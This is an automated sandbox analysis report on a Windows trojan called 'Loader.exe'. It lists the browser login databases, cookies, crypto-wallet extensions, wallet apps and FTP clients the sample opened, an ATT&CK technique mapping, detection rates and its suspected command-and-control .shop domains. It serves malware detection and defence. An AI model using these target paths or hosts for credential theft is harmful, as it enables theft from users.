                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00D4AA37
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,2_2_00D463F5
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,2_2_00D4AC88
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00D4AD30
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,2_2_00D4AFF0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,2_2_00D4AF83
                Source: C:\Users\user\Desktop\Loader.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D3A335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D3A335
                Source: C:\Users\user\Desktop\Loader.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Loader.exe, 00000002.00000003.2380587383.0000000005291000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745461438.0000000005291000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745313659.000000000528B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745521965.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2380230450.000000000528E000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1768402019.0000000005291000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1751977720.000000000528B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Loader.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: Loader.exe PID: 2588, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: Loader.exe, 00000002.00000003.1729657655.0000000003035000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Loader.exe, 00000002.00000003.1729568333.0000000003065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
                Source: Loader.exe, 00000002.00000003.1729568333.000000000300A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Loader.exe, 00000002.00000003.1729568333.000000000302A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 2588, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Loader.exe PID: 2588, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (number of matching signatures in parentheses; techniques without a number had no match):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Windows Management Instrumentation (12), PowerShell (1), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (211), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion (21), Process Injection (211), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), Software Packing (1), DLL Side-Loading (1), Compile After Delivery, Indicator Removal from Tools
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (1), Query Registry (1), Security Software Discovery (241), Virtualization/Sandbox Evasion (21), Process Discovery (1), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (33)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Screen Capture (1), Archive Collected Data (1), Data from Local System (4), Clipboard Data (3), Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (21), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Source | Detection | Scanner | Label
Loader.exe | 45% | ReversingLabs | Win32.Trojan.Generic
Loader.exe | 39% | Virustotal |
Loader.exe | 100% | Joe Sandbox ML |

No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://fancywaxxers.shop:443/apiackages | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/apil | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/AA | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fancywaxxers.shop | 104.21.48.1 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
fancywaxxers.shop | false | | high
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
nearycrepso.shop | false | | high
https://fancywaxxers.shop/api | false | | high
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.48.1 | fancywaxxers.shop | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582939
Start date and time: 2025-01-01 02:56:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Loader.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 52
• Number of non-executed functions: 120
Cookbook Comments:
• Found application associated with file extension: .exe
